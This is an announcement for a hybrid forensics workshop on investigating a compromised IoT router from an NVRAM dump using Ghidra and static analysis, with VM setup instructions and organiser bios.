Date and Time:
Tuesday, March 19, 14:00 – 18:00

This workshop is hybrid (online and face-to-face).

Description:

The danger posed by vulnerable IoT devices lays in large part to its potential for widespread takeover, as was experienced in the infamous Mirai botnet formation that maintained over 200,000 compromised IoT devices exploited through, amongst other techniques, exploited server code. This workshop trains participants to investigate an exploitable IoT device, from firmware extraction to takeover. Participants will come to understand the utility of persistent storage devices such as NVRAM for transferring injected commands across binary boundaries for remote code execution and persistent device takeover.

The exercise involves a realistic training scenario where a router purchased by a company began to exhibit strange intervals of connectivity downtime. Employees suspected tampering and performed an NVRAM dump before completely unplugging the router in fear. Being a junior enterprise, they did not have the necessary network security infrastructure in place to monitor network traffic, and thus could not evidence whether the device was in-fact compromised, nor how.

The company assembled a group of specialists from around the world to investigate the situation and have thus provided the device, firmware version, and the NVRAM memory dump. The dump – a listing of key-value pairs revealing a particular state of persistent memory – is the only starting point available for investigation; all other contents were reset when the device was unplugged. Curious values appear in the dump, including suspicious configuration values. As forensic analysts, the question becomes, how did such a value arrive in NVRAM, what can it do, and is it sufficient evidence to lead our investigation to conclude device takeover?

By leveraging static analysis techniques including extracting binary file metadata, front-end interface DOM scraping, and implementing basic data-flow analysis in Ghidra, attendees will find the source of the attack and come to realize the potential methods and techniques taken by the attacker to achieve device takeover.

Preparation Details:

Please download the appropriate VM and set it up (import + test) on your computer before the workshop. If you do not want to use a VM, please see the “WORK_ON_YOUR_OWN_MACHINE_SETUP” guide for installing all dependencies on your own computer.l

For either VM you load, the username and password are dfrwseu2024 (username == password).

For those NOT using Apple Silicon Chipsets (M1+)

  • Download the VM found in the folder “VIRTUALBOX_WINDOWS11”
  • Download VirtualBox based on your host system
  • In VirtualBox
    • Press “Import”
    • Search & Select “dfrws2024.ova” file from your filesystem
    • Wait for the import process to complete
  • Select the newly imported virtual machine
    • press “Start”
    • If you experience freezes, shut down the virtual machine and enable “3D acceleration” in the display options. If this doesn’t work, roll up sleeves and debug using forums and youtube
    • Adjust the number of CPUs and Memory (RAM) optimal for your host machine (more resources does not always equal a faster virtual machine, try reducing settings as well)

For those USING Apple Silicon Chipsets (M1+)

  • Download “UTM_WINDOWS11.zip”
  • Download UTM
  • Unzip “UTM_WINDOWS11.zip”
  • Open UTM
    • File > Open
    • Select “DFRWS_EU_2024_APPLE_SILICON_WINDOWS_VM.utm” file inside the “UTM_WINDOWS11” folder
    • Select your newly imported VM, then select the dropdown menu just below “Shared Directory” (not beside it), and press the “Browse” dropdown-option. This will be used to load the operating system ISO file
    • Browse and select the “22631.2861.231204-0538.23H2_NI_RELEASE_SVC_REFRESH_CLIENTCONSUMER_RET_A64FRE_en-us.iso” file in the “UTM_WINDOWS11” folder.
    • Adjust the number of CPUs and Memory (RAM) optimal for your host machine (more resources does not always equal a faster virtual machine, try reducing settings as well)
    • Start the VM!

Workshop organiser:

Anthony Andreoli is a Ph.D. researcher at Concordia University’s Security Research Center in Montreal, Quebec, Canada. His work focuses on binary code understanding and pattern detection for vulnerability analysis, detection, and prevention. An experienced teacher and communicator of ideas, he has been teaching computer science related material for over 5 years to students at both the undergraduate and graduate levels. He spends his free time endlessly inquiring about the nature of existence and human behaviour, and has an extremely shrunken perception of time.

Anis Lounis is a Ph.D. student and dedicated member of Concordia University’s Security Research Center in Montreal, Quebec, Canada, focuses on advancing embedded system security. His expertise lies in uncovering vulnerabilities in IoT devices, complemented by a background in Malware Analysis.